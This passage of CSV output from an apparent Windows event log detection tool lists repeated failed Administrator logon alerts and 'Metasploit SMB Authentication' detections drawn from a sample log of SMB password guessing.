SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iYtujXkzySwZQFk8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.285 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KE9v6wzrebvjvDIl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.327 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.365 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 81gmRFFBHI1s4dqi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.365 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: C8gHWPDjQM8M3tiQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.409 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: szj4mJvtFV06CuR2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.442 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ceGEl87hOM0InAAd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.493 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XRv3C3rRxYXTgckj : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.541 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.581 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TaPkJPIQnbL3VyUC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.581 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LZ7PZAT6hWWHNc29 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.618 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AJVD4uVhwfLSJ6Ab : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.664 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q6KME1I6tE0v9UAq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Qtt1rk4n3tOJko2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.751 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: prPsA8EZHGfGPSHm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: TQqGXnwHtB87LSzT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.870 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6uLT1bjaIS0XBsWC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.870 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PIgpraQTxFrcLphN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1D6qy57XImq4prx : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.957 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Kw44Ffh4DIPlyuM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:29.992 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oKUdmKU74RmJysAx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.037 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gZUTzZw0T1tYRSP5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nEOfjuAMa7HTsfcP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.127 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e7bG19emMTmyBQNm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.243 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YsLkgWukfqS3wWJK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.332 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: liFcZjjpY3xXwe9j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.373 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vBUgbfzx2OEcOxWL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.422 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iVCV0WoZmLTFNH71 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.475 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.516 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZJmxGOqck4oQi1kL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.516 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w7lYqaUvEtTp18DK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.561 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yZ9xQmGn61JJDeQS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XuMXpvY9fmLm0eBq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.649 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ofesuNErTLWuN0k4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.701 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KsNq7SThd3b8oTwF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmRWg5gNRcxDMFjg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.797 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: JXrGn6LehVwTGNNj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vIq9DS71jCjWbgdY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.880 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kw2BQbdUml0EPNOs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.937 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ugOqsKQFGmmLac3s : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:30.981 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3rZHUbOUVBYiHarB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.021 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: otv8ByrbWWoTz7pi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.049 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HVlHkJu4Gxc9dhxM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.083 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xKF5OCqLVVKvung0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.129 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.162 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: avAdpkOlP0xji1vG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.162 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.214 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VFgzMjEz6M0LBnX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.214 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: kdJb0obVAqkY9GCw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6ciSoQcLUgLfzaNg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.301 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RECrGCCTJuDPlvYJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.340 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:31.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Z2w67uyC2NOgecT : IP Address: 192.168.198.149 : AuthPackage: 
